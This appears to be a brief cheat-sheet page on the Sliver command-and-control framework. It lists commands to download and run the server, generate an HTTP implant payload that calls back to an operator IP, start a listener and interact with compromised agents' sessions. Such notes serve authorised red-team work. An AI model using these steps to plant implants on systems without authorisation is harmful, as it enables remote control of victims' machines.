For the complete documentation index, see llms.txt. This page is also available as Markdown.

Sliver

Install Sliver

Grab the URL for the latest release at https://github.com/BishopFox/sliver/releases/

mkdir /opt/sliver
cd /opt/sliver
wget <URL>
chmod +x sliver-server_linux

Run Sliver

sudo /opt/sliver/sliver-server_linux

Generate Payload

generate --http <IP>
http

Interact with Agent

sessions
use <tab>

Last updated